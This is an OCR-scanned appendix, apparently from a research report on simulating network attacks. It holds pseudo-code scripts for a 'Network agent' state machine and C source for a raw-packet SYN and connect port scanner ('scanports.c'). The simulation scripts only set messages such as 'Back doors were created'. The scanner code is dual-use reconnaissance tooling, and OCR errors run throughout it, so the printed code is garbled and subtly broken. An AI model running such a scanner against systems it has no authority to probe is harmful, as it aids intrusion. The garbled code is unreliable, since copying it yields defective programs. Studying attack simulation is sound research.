Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


165 


Script  of  the  “Network  agent”  behaviour  in  the  state  Cl  of  the  state  machine  N 

_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  IF  (newAttack.Name="NS")  THEN 

CALLSCRIPT  (Net_CI_NS_Do); 

Net_CI_Do  RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
CALLSCRIPT  ( Check_Fire wall_Do) ; 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALLSCRIPT  (Net_CI_Do2); 

ENDIF; 

MESSAGE  (Attack.Reply  Template, InReplyWith=InMSG.ReplyWith); 
RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host. IP !=""))  THEN 
CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

CALLSCRIPT  (Net_CI_Do2); 

MESSAGE  (Attack, InformTemplate,InReplyWith=InMSG.ReplyWith); 
ENDIF; 

UNTIL  (Host.NextQ); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG,ReplyWith); 

RETURN  (); 

ENDIF; 


Transitions.  Condition  /  Next  state  /  Action 


□ 

End 

□ 

Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  Cl  of  the  state  machine  N 

_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  CALLSCRIPT  (Attack_Erase_Do);  str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

Net_CI_Do2  IF  (bX)  THEN 

IF  (newAttack.Name="AM")  THEN 

IF  (Host.Mask!="")  THEN  (Attack.Mask=Host.Mask);  ENDIF; 

ENDIF; 

IF  (newAttack.Name="IST" )  THEN 
IF  (Host.SysTime)  THEN  (Attack.SysTime=Host.SysTime);  ENDIF; 

ENDIF; 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 

Attack.  SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 
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Additional  script  of  the  “Network  agent”  behaviour 
in  the  state  Cl  of  the  state  machine  N  (NS  attack) 
_ Entry _ 


|  Entry  action 

|  State  action  | 

Do  action 

IF  (newAttack.IsNet=l)  THEN 

Net_CI_NS_Do 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 

REPEAT 

IF  (Host.Exist(Host. IP  !=""))  THEN  DELETEALL  (xAttack); 

CALLSCRIPT  (Check_Firewall_Do2);  IF  (NOT  bZ)  THEN 
REPEAT 

IF  ( DNS  1  .Exist(DNS  1  ,IP=Host.IP))  THEN 
str="";  AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 
IF  (bX)  THEN  xAttack.Create();  xAttack.IsNet=l; 

xAttack.Name=newAttack.Name;  xAttack.SubClassO=newAttack.SubClassO; 
xAttack.ip=Host.IP;  xAttack.DNSlHostIP=DNSl.HostIP; 
xAttack.DNSlHostName=DNSl.HostName; 

ENDIF; 

ENDIF; 

UNTIL  (DNSl.NextO); 

MESSAGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 

REPEAT 

IF  (DNS2.Exist( DNS2.IP=Host.IP ) )  THEN 
str="";  AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN  xAttack. Create( ) ;  xAttack.IsNet=l; 

xAttack.Name=newAttack.Name;  xAttack.SubClassO=newAttack.SubClassO; 
xAttack.ip=Host.IP;  xAttack.DNS2DomName=DNS2.DomName; 
xAttack.DNS2Post=DNS2.Post;  ENDIF;  ENDIF; 

UNTIL  (DNS2.Next()); 

MESSAGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 

ENDIF; 

UNTIL  (Host.NextO); 

ENDIF; 

DELETEALL  (xAttack);  CALLSCRIPT  (Attack.Erase.Do); 

MESSAGE  (0, Reply Template.InReplyWith=InMSG.ReplyWith);  RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=0)  THEN  DELETEALL  (xAttack); 

IF  (Host.Exist(Host.IP  =  newAttack.ip)  THEN  CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

REPEAT 

IF  ( DNS  1  .Exist(DNS  1  ,IP=Host.IP))  THEN 
str="";  AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN  xAttack. Create!);  xAttack.IsNet=l; 

xAttack.Name=newAttack.Name;  xAttack.SubClassO=newAttack.SubClassO; 
xAttack.ip=Host.IP;  xAttack.DNSlHostIP=DNSl.HostIP; 
xAttack.DNS  1  HostName=DNS  1  .HostName; 

ENDIF;  ENDIF; 

UNTIL  (DNSl.NextO); 

MESSAGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 

REPEAT 

IF  (DNS2. Exist( DNS2.IP=Host.IP ) )  THEN 
str="";  AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN  xAttack. Create () ;  xAttack.IsNet=l; 

xAttack.Name=newAttack.Name;  xAttack.SubClassO=newAttack.SubClassO; 
xAttack.ip=Host.IP;  xAttack.DNS2DomName=DNS2.DomName; 
xAttack.DNS2Post=DNS2.Post; 

ENDIF;  ENDIF; 

UNTIL  (DNS2.Next()); 

MESSAGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith):  RETURN  (); 


ENDIF; 


|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

□ 

Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  EP  of  the  state  machine  N 


Entry 


Entry  action 


State  action 


Do  action 
Net_EP_Do 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
C AT. T. SCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALLSCRIPT  (Net_EP_Do2); 

ENDIF; 

MESSAGE  (Attack,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 
RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host.IP  !=" "))  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

CALLSCRIPT  (Net_EP_Do2); 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG.Reply  With); 

ENDIF; 

ENDIF; 

UNTIL(Host.NextO); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

End 

□ 

Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  EP  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_EP_Do2 

CALLSCRIPT  (Attack_Erase_Do); 
str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX  )  THEN 

IF  (newAttack.Name="PC")  THEN 

Attack.Message="The  privileges  are  extended  by  password  cracking";  ENDIF 

IF  (newAttack.Name="UKE")  THEN 

Attack.Message="The  privileges  are  extended  by  exploits  executing";  ENDIF; 
Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.  SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  GAD  of  the  state  machine  N 


Entry 


Entry  action 


State  action 


Do  action 
Net_GAD_Do 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALLSCRIPT  (Net_GAD_Do2); 

ENDIF; 

MESSAGE  (Attack, Reply Template,InReplyWith=InMSG.ReplyWith); 
RETURN  0; 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  ( L AN .Exist(L AN ,IP=ne w Attack. ip) )  THEN 
REPEAT 

IF  (Host.Exist(Host.IP  !=""))  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
CALLSCRIPT  (Net_GAD_Do2); 

MESSAGE  (Attack,InformTemplate,InReplyWith=InMSG.ReplyWith); 
ENDIF; 

ENDIF; 

UNTIL  (Host.NextQ); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

End 

□ 

Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  GAD  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_GAD_Do2 

CALLSCRIPT  (Attack_Erase_Do);  str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX  )  THEN 

IF  (newAttack.Name="ETR")  THEN 

Attack. Message="The  trust  relations  were  discovered"; 

ENDIF; 

IF  (newAttack.Name="SCP")  THEN 

Attack.Message="The  passwords  were  obtained"; 

ENDIF; 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 

Attack.  SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  CVR  of  the  state  machine  N 


Entry 


Entry  action 


State  action 


Do  action 

Net_CVR_Do 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
C  ATT  .SCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CAT .T .SCRIPT  (Net_CVR_Do2); 

ENDIF; 

MESSAGE  (Attack, Reply Template,InReplyWith=InMSG.ReplyWith); 
RETURN  0; 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host.IP !=""))  THEN 

C ALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
CALLSCRIPT  (Net_CVR_Do2); 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG.Reply  With); 
ENDIF; 

ENDIF; 

UNTIL  (HosLNext()); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

End 

□ 

Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  CVR  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_CVR_Do2 

CALLSCRIPT  (Attack_Erase_Do);  str=""; 

AttRandom  (newAttack.Name,str,  new  Attack.  Subclass  l,str,Host.IP,bX); 

IF  (bX  )  THEN 

IF  (newAttack.Name="FRR")  THEN 

Attack.Message  ="File(s)  reading  was  executed""; 

ENDIF; 

IF  (newAttack.Name="RBV")  THEN 

Attack.Message="File(s)  was  (were)  read"; 

ENDIF; 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 

Attack. Subclass l=newAttack.SubClassl;  Attack.ip=Host.IP; 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  IVR  of  the  state  machine  N 


Entry 


Entry  action 


State  action 


Do  action 
Net_IVR_Do 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
C  ATT  .SCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

C ALLSCRIPT  (Net_IVR_Do2); 

ENDIF; 

MESSAGE  (Attack, Reply Template,InReplyWith=InMSG.ReplyWith); 
RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host.IP  !=""))  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
CALLSCRIPT  (Net_IVR_Do2); 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG.Reply  With); 
ENDIF; 

ENDIF; 

UNTIL  (Host.NextQ); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

End 

□ 

Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  IVR  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_IVR_Do2 

CALLSCRIPT  (Attack_Eras  e_Do);  str=""; 

AttRandom  (newAttack.Name,str,newAttack.SubClassl,str,Host.IP,bX); 

IF  (bX)  THEN 

IF  (newAttack.Name="DFR" )  THEN 

Attack.Message="  File(s)  was  (were)  read"; 

ENDIF; 

IF  (newAttack.Name="DBV")  THEN 

Attack.Message="File(s)  was  (were)  deleted"; 

ENDIF; 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 

Attack. Subclass  l=newAttack.SubClassl;  Attack.ip=Host.IP; 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  CT  of  the  state  machine  N 


Entry 


Entry  action 


State  action 


Do  action 

Net_CT_Do 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
C  ATT  .SCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  END  IF; 

CALLSCRIPT  (Net_CT_Do2); 

ENDIF; 

MESSAGE  (Attack, Reply Template,InReplyWith=InMSG.ReplyWith); 
RETURN  0; 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host.IP  !=""))  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
CALLSCRIPT  (Net_CT_Do2); 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG.Reply  With); 
ENDIF; 

ENDIF; 

UNTIL  (Host.NextQ); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


|  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

End 

□ 

Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  CT  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_CT_Do2 

CALLSCRIPT  (Attack_Erase_Do);  str=’"'; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX  )  THEN 

IF  (newAttack.Name="CL")  THEN 

Attack.Message="The  logs  were  cleared"; 

ENDIF; 

IF  (newAttack.Name="HT")  THEN 

Attack.Message="  Hiding  traces  tools  was  successfully  executed"; 

ENDIF; 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 

Attack.  SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Exit  action 


Entry  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  CBD  of  the  state  machine  N 


Entry 


State  actim 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
C  ATT  .SCRIPT  (Check_Fire wall_Do ) ; 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALLSCRIPT  (Net_CBD_Do2); 

ENDIF; 

MESSAGE  (Attack, Reply Template,InReplyWith=InMSG.ReplyWith); 
RETURN  0; 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host.IP  !=""))  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
CALLSCRIPT  (Net_CBD_Do2); 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG.Reply With); 
ENDIF; 

ENDIF; 

UNTIL  (Host.NextQ); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


Transitions.  Condition  /  Next  state  /  Action 


End 


Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  CBD  of  the  state  machine  N 


Entry 


Entry  action 


Do  action 


Net  CBD  Do2 


State  action 


CALLSCRIPT  (Attack_Erase_Do);  str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 
IF  (bX  )  THEN 

Attack.Message="Back  doors  were  created"; 
Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 
Attack. SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 


Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


Appendix  3.  Examples  of  the  source  codes  of  network  traffic  generation 
programs 

A3.1.  Source  code  of  program  scanports.c 

/*  using  winpcap  library  version  3.0  alpha  4  */ 

#include  <pcap.h> 

/*  using  libnetnt  library  version  1.0.2f  */ 

#include  <libnet.h> 

#include  "getopt.h" 

/*  maximum  length  of  filter  */ 

#define  M  AX_FILTER_LEN GTH  1024 
#define  DEFAULT_TIME_OUT  1 

/*  prototypes  of  functions  */ 
void  usage(); 

int  mainCint  argc,  char  **argv)  { 

char  packet_filter[MAX_FILTER_LENGTH];  /*  filter  for  receiving  packets  */ 
pcap_if_t  *alldevs;  /*  network  devices  */ 
pcap_if_t  *d;  /*  selected  network  device  */ 
int  inum=0;  /*  counter  */ 
int  i=0;  /*  counter  */ 
pcap_t  *adhandle; 

char  errbuffPC  AP_ERRBUF_SIZE] ; 
u_int  netmask; 
struct  bpf_program  fcode; 
struct  tm  *ltime; 

char  timestr[16]; 
struct  libnet_ip_hdr  *iph; 
struct  libnet_tcp_hdr  *tcph; 
u_int  ip_len; 

time_t  localtimel;  /*  for  timeout  */ 
time_t  localtime2; 

u_short  bport,  eport;  /*  pair  of  ports  */ 
u_short  eport;  /*  current  port  */ 
int  network,  packet_size; 
u_long  src_ip=0,  dst_ip=0; 
u_short  dst_beg_prt=0,  dst_end_prt=0,  cur_prt=0; 
u_char  *packet;  //  SYN  packet 
u_char  *packetRST;  //  RST  ACK  packet 
int  circle  =  1 ; 
int  res  =  0; 

struct  pcap_pkthdr  *header; 

u_char  *pkt_data; 

u_long  seq_number; 

u_long  seq_number_from_server; 

u_long  ack_number; 

char  *source; 

char  *destination; 

int  timeout  =  DEFAULT_TIME_OUT;  //  timeout  in  seconds 
u_short  src_prt; 

struct  libnet_plist_chain  plist;  /*  chain  of  ports  */ 
struct  libnet_plist_chain  *plist_p; 
char  c; 

int  j; 

u_char  *cp; 

char  *scan_types;  /*  type  of  scan  */ 
char  cur_scan_type  =  'n'; 
struct  sockaddr_in  peer; 

WSADATA  WSAData; 
int  s;  /*  socket  */ 
int  re;  /*  result  */ 
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/*  arguments  */ 

while((c  =  getopt(argc,  argv,  "i:s:d:t:p:h:"))  !=  EOF)  { 
switch  (c)  { 
case  'i1: 

/*  number  of  network  device  */ 
inum  =  atoi(optarg); 
break; 
case  'h': 

/*  source  ip-address  and  port  */ 

/*  we  are  expected  'ip.ip.ip.ip.port'  */ 
if  (!(cp  =  strrchr(optarg,  V)))  { 
usageQ; 

} 

*cp++  =  0; 

src_prt  =  (u_short)atoi(cp); 
source  =  optarg; 

if  (!(src_ip  =  libnet_name_resolve(optarg,  LIBNET_RESOLVE))) 

libnet_error(LIBNET_ERR_FATAL,  "Bad  source  IP  address:  %s\n",  optarg); 
break; 
case 'd': 

/*  destination  ip -address  */ 
destination  =  optarg; 

if((dst _ ip  =  libnet_name_resolve(optarg,  1))  ==  -1) 

libnet_error(LIBNET_ERR_FATAL,  "Bad  destination  IP  address;  %s\n",  optarg); 
break; 
case  't': 

timeout  =  atoi(optarg); 

if  (timeout  <  0)  timeout  =  DEFAULT_TIME_OUT; 
break; 

case  'p': 

/*  ports  list  */ 
plist_p  =  &plist; 

if  (libnet_plist_chain_new(&plist_p,  optarg)  ==  -1)  { 

libnet_error(LIBNET_ERR_FATAL,  "libnet_plist_chain_new  failed\n" ); 

I 

break; 

case  's': 

/*  type  of  scan  */ 
scan_types  =  optarg; 

cur_scan_type  =  scan_types[0]; 
break; 

} 

I 

if ( ! src _ ip  II  !src_prt  II  !dst_ip)  usage)); 

if(inum  ==  0)  usage(); 

/*  get  a  list  of  network  devices  */ 
if(pcap_findalldevs(&alldevs,  errbuf)  ==  -1)  { 

fprintf(stderr,"Error  in  pcap_findalldevs:  %s\n",  errbuf); 
exit(l); 

} 

/*  number  of  devices  */ 
for(d=alldevs;  d;  d=d->next)  i++; 
if(i==0)  { 

printf("\nNo  interfaces  found!  Make  sure  WinPcap  is  installed.Vn"); 
return  -1; 

} 

/*  incorrect  device  */ 
if(inum  <111  inum  >  i)  { 

printf("\nlnterface  number  out  of  range. \n"); 

pcap_freealldevs(alldevs); 

return -1; 

I 

/*  set  selected  device  */ 

foil'd  =  alldevs,  i  =  0;  i  <  (inum-1);  d  =  d->next,  i++); 

/*  initialize  random  */ 
if  (libnet_seed_prand()  ==  -1) 
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libnet_error(LIBNET_ERR_FATAL,  "libnet_seed_prand  failed\n"); 

switch  (cur_scan_type)  { 
case  T: 

printf("Starting  scanports  v.  1.0\n"); 
printf("TCP  connect  scan.\n\n"); 

res  =  WSAStartup((WORD)((l  «  8)  I  1),  (LPWSADATA)&WSAData); 
if(res  !=  0){ 

printf("WSAStartup()  error,  program  exits  now\n"); 
exit(O); 

} 

peer.sin_family  =  AF_INET; 

/*  convert  destination  ip -address  from  dotted  format  into  unsigned  long  binary  representation  */ 
peer.sin_addr.s_addr  =  inet_addr(destination); 
while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 

s  =  socket! AF_INET,  SOCK_STREAM,  0); 
if(s  ==  IN V ALID_SOCKET)  { 
printf("Error  in  socket  call!\n"); 

WSACleanupO; 

exit(0); 

} 

eport  =  bport++;  /*  current  port  */ 
peer.sin_port  =  htons(cport); 

re  =  connect!  s,  (  struct  sockaddr  *  )&peer,  sizeof(  peer ) ); 
if (re)  { 

printf("%s.%d->%s.%d  TCP  connect:  failed\nPort  is  seems  to  be  CLOSED.\n\n",  source, 
src_prt,  destination,  ntohs(peer.sin_port)); 

}  else  { 

printf("%s.%d->%s.%d  TCP  connect:  success\nPort  is  seems  to  be  OPEN.\n\n",  source, 
src_prt,  destination,  ntohs(peer.sin_port)); 

} 

closesocket(s); 

} 

I 

WSACleanupO; 
break; 
case  'S': 

printf(" Starting  scanports  v.l.0\n"); 

printf("TCP  scanning  by  using  SYN  messages.\n\n"); 

/*  construction  TCP  SYN  and  TCP  RST  ACK  packets  */ 

/*  packet  size:  no  data,  only  TCP  and  IP  headers  */ 
packet_size  =  LIBNET_IP_H  +  LIBNET_TCP_H; 

/*  initialize  network  interface  */ 

network  =  libnet_open_raw_sock(IPPROTO_RAW); 

iffnetwork  ==  -1)  libnet_error!LIBNET_ERR_FATAL,  "Can't  open  network.Vn"); 
libnet_init_packet(packet_size,  &packet); 
libnet_init_packet!packet_size,  &packetRST); 
if(!adhandle=  pcap_open_live(d->name,  //  name  of  the  device 

65536,  //  portion  of  the  packet  to  capture. 

//  65536  grants  that  the  whole  packet  will  be  captured  on  all  the  MACs. 

1,  //  promiscuous  mode 

1000,  //  read  timeout 

errbuf  //  error  buffer 
) )  ==  NULL)  { 

fprintf(stderr,"\nUnable  to  open  the  adapter.  %s  is  not  supported  by  WinPcap\n"); 
pcap_freealldevs!  allde  vs) ; 
return  -1; 

} 

/*  Ethernet?  */ 

if(pcap_datalink(adhandle)  !=  DLT_EN10MB)  { 

fprintf(stderr,"\nThis  program  works  only  on  Ethernet  networks.Nn"); 
pcap_freealldevs(alldevs) ; 
return  -1; 

} 

iffd->addresses  !=  NULL) 
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/*  get  a  network  mask  for  selected  device  (first  ip -address  for  this  device)  */ 
netmask=((struct  sockaddr_in  *)(d->addresses->netmask))->sin_addr.S_un.S_addr; 


/*  else  network  class  is  C  */ 
netmask=Oxffffff ; 

printf("Selected  device:  %s\n",  d->description); 

pcap_freealldevs(alldevs); 

while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 
circle  =  1 ; 

eport  =  bport++;  //  current  port 

if((packet  ==  NULL)  II  (packetRST  ==  NULL))  libnet_error(LIBNET_ERR_FATAL, 
"libnet_init_packet  failed\n"); 

/*  packet  construction  (IP  header)  */ 

libnet_build_ip(LIBNET_TCP_H,  /*  size  of  the  packet  sans  IP  header  */ 


IPTOS_LOWDELAY, 

242, 

0, 

48, 

IPPROTO_TCP, 

src_ip, 

dst_ip, 

NULL, 

0, 

packet); 

libnet_build_ip(LIBNET_TCP_H, 


/*  IP  tos  */ 

/*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 

/*  size  of  the  packet  sans  IP  header  */ 


IPTOS_LOWDELAY, 

242, 

0, 

48, 

IPPROTO_TCP, 
src_ip, 
dst_ip, 

NULL, 

0, 

packetRST); 

/*  packet  construction  (TCP  header)  */ 

/*  random  sequence  number  */ 
seq_number  =  libnet_get_prand(LIBNET_PRu32); 
ack_number  =  0; 
libnet_build_tcp(src_prt. 


/*  IP  tos  */ 

/*  IP  ID  */ 

/*  frag  stuff  */ 

/*  TTL  */ 

/*  transport  protocol  */ 

/*  source  IP  */ 

/*  destination  IP  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


eport, 

seq_number, 

ack_number, 

TH_SYN, 

1024, 

0, 

NULL, 


/*  source  TCP  port  */ 

/*  destination  TCP  port  */ 

/*  sequence  number  */ 

/*  acknowledgement  number  */ 
/*  control  flags  */ 

/*  window  size  */ 

/*  urgent  pointer  */ 

/*  payload  (none)  */ 

/*  payload  length  */ 

/*  packet  header  memory  */ 


0, 

packet  +  LIBNET_IP_H); 

/*  checksum  (only  TCP  header)  */ 

if(libnet_do_checksum(packet,  IPPROTO_TCP,  LIBNET_TCP_H)  ==  -1) 
libnet_error(LIBNET_ERR_FATAL,  "libnet_do_checksum  failed\n"); 

/*  preparing  for  catch  */ 

/*  construct  a  filter  */ 

j  =  sprintf(packet_filter,  "ip  and  tep  and  sre  host  %s  and  dst  host  %s  and  sre  port  %d  and  dst  port  %d", 
destination,  source,  eport,  src_prt); 
if(pcap_compile(adhandle,  &fcode,  packet_filter,  1,  netmask)<0  ){ 

fprintf(stderr,"\nUnable  to  compile  the  packet  filter.  Check  the  syntax. \n"); 

pcap_freealldevs(alldevs); 

return  -1; 


if(pcap_setfilter(adhandle,  &fcode)<0)  { 

fprintf(stderr,"\nError  setting  the  filter.Xn”); 

pcap_freealldevs(alldevs); 

return -1; 
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} 

c  =  libnet_write_ip(network,  packet,  packet_size); 
if(c  <  packet_size)  { 

libnet_error(LN_ERR_WARNING,  "libnet_write_ip  only  wrote  %dbytes\n",  c); 

}  else  { 

printf("l.  %s.%d->%s.%d  TCP  SYN  (seq:  %x  ack:  %x)\n",  source,  src_prt,  destination, 
cport,  seq_number,  ack_number); 

} 

time(&localtime  1 ) ; 
while(circle){ 

res  =  pcap_read_ex(adhandle,  &header,  &pkt_data); 
if(res  ==  0)  { 

/*  timeout  */ 

time( &localtime2) ; 

if  ((localtime2-localtimel)>timeout)  { 

printf("port  %d  is  TIME  OUT!\n",  cport); 
break; 

} 

continue; 

}  else  { 

if  (res  >  0)  { 
circle  =  0; 

ltime=localtime(&header->ts.tv_sec); 

strftime(  timestr,  sizeof  timestr,  "%H:%M:%S",  ltime); 

iph  =  (struct  libnet_ip_hdr  *)  (pkt_data  + 

LIBNET_ETH_H) ; 
ip_len  =  (iph->ip_hi  &  Oxf)  *  4; 

tcph  =  (struct  libnet_tcp_hdr  *)  ((u_char*)iph  +  ip_len); 
seq_number_from_server  =  ntohl(tcph->th_seq); 

/*  RST  +  ACK  =  port  is  closed 
*  SYN  +  ACK  =  port  is  open  */ 
if  (tcph->th_flags  ==  (TH_RST+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  RST  ACK  (seq:  %x  ack:  %x)\nPort  %d  is  seems  to 
be  CLOSED  An",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 

1 

if  (tcph->th_flags  ==  (TH_SYN+TH_ACK))  { 

printf("2.  %s.%d->%s.%d  TCP  SYN  ACK  (seq:  %x  ack:  %x)\nPort  %d  is  seems 
to  be  OPEN.Vn",  destination,  ntohs(tcph->th_sport),  source, 
ntohs(tcph->th_dport),  seq_number_from_server,  ntohl(tcph->th_ack),  cport); 

} 

